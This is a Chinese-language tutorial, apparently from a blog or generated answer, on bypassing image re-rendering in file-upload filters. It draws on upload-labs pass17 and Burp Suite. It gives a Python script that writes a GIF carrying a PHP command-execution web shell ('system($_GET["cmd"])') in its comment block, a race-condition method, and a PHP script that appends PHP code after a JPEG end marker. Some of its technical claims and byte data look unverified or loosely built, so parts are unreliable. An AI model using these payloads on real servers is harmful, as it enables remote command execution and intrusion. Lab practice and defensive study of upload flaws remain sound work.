文件上传绕过二次渲染

### 文件上传中的二次渲染问题及其解决方案 在文件上传的过程中，为了防止恶意代码注入以及提高图片质量或压缩率，许多应用会对上传的图片进行二次渲染。然而，这种机制可能导致隐藏于图片中的后门代码被清除，从而影响攻击的有效性[^3]。 #### 方法一：利用 GIF 图片特性 GIF 格式的图片相较于其他格式（如 PNG 和 JPG），具有更高的兼容性和稳定性。即使经过二次渲染，GIF 的某些元数据区域仍能保持不变，因此可以尝试将恶意代码嵌入到这些未受影响的部分中[^4]。具体实现如下： 1. 利用专门的工具（如 GifShell 或其他后门生成器）创建带有恶意代码的 GIF 图片。 2. 将该图片上传至目标服务器并触发二次渲染过程。 3. 验证渲染后的图片是否仍然携带有效载荷。 以下是使用 Python 创建简单 GIF 后门的一个例子： ```python import struct def create_gif_payload(output_filename, payload): with open(output_filename, 'wb') as f: # GIF Header f.write(b"GIF89a") # Logical Screen Descriptor f.write(struct.pack("<H", 10)) # Width f.write(struct.pack("<H", 10)) # Height f.write(bytes([0xF0])) # Packed fields f.write(bytes([0, 0, 0])) # Background color index and pixel aspect ratio # Graphic Control Extension (optional) f.write(b"\x21\xF9\x04") f.write(bytes([0, 0, 0, 0])) f.write(b"\x00") # Image Descriptor f.write(b",\x00\x00\x00\x00\x0A\x00\x0A\x00\x00") # LZW Minimum Code Size f.write(bytes([2])) # Pixel Data f.write(b"\x0C\x02\x8E\xD5\xAA\xAC\xB2\xEB\xEE\xFC`\xD7\xCE`'\xC5j\xBE\xFE`\xA6\xAE\xDCf\xDE`\xB6\xBC\xDAh\xDF`\xAE\xBA\xDBi\xEF`\xAB\xBB\xDBk\xFF`\xA8\xB8\xDBm/\x00") # Payload Injection into Comment Block f.write(b"!\xFE") # Start of comment extension block f.write(len(payload).to_bytes(1, byteorder='little')) # Length of the data sub-blocks f.write(payload.encode()) # Actual payload content f.write(b"\x00") # Terminator create_gif_payload('malicious.gif', '<?php system($_GET["cmd"]); ?>') ``` 此脚本生成了一个包含 PHP 命令执行功能的小型 GIF 文件。 --- #### 方法二：条件竞争绕过 通过时间差或者并发请求的方式，在文件尚未完成二次渲染之前读取原始文件内容。这种方法依赖于特定环境下的竞态条件漏洞。例如，在 `upload-labs-pass17` 中提到的例子展示了如何借助 Burp Suite Repeater 工具快速发送多个 HTTP 请求来捕获临时存储路径上的未经处理版本的数据包。 操作流程概述如下： 1. 使用合法扩展名提交待测试档案； 2. 迅速发起另一条指向相同资源位置的新连接； 3. 如果成功，则能够下载到还未经历图像转换阶段之前的副本。 需要注意的是，这种方式的成功概率较低，并且容易受到防火墙规则或其他安全措施的影响。 --- #### 方法三：选择合适的函数库行为差异 不同的编程语言和框架对于图形对象的操作可能存在细微差别。比如 PHP GD 库支持多种输入输出选项，而 Imagick 扩展则提供了更多高级控制手段。如果应用程序仅限定了部分 API 调用形式的话，那么就可以探索是否存在可替代方案以规避过滤逻辑[^2]。 假设当前场景下只允许调用了 `imagecreatefromgif()` 来加载素材，但并未严格限定后续保存环节所使用的类目名称参数设置情况时，我们可以试着调整导出配置使得最终产物保留额外信息片段而不破坏整体结构完整性。 示例代码展示自定义 JPEG 输出头部附加字符串的方法： ```php <?php $source = imagecreatefromjpeg('./input.jpg'); ob_start(); imagejpeg($source, null, 100); $data = ob_get_contents(); ob_end_clean(); // Append custom shellcode after valid marker segment $newData = substr($data, 0, strpos($data,"\xFF\xD9")+2)."<?php echo 'Hello';?>"; file_put_contents('./output.jpg', $newData); ?> ``` 上述脚本演示了怎样手动拼接一段 PHP Webshell 至常规 JEPG 结束标记之后的位置上。 --- ### 注意事项 尽管以上技术能够在一定程度上帮助突破限制，但在实际渗透测试活动中应当始终遵循法律法规及道德准则行事。未经授权擅自访问他人计算机信息系统属于违法行为！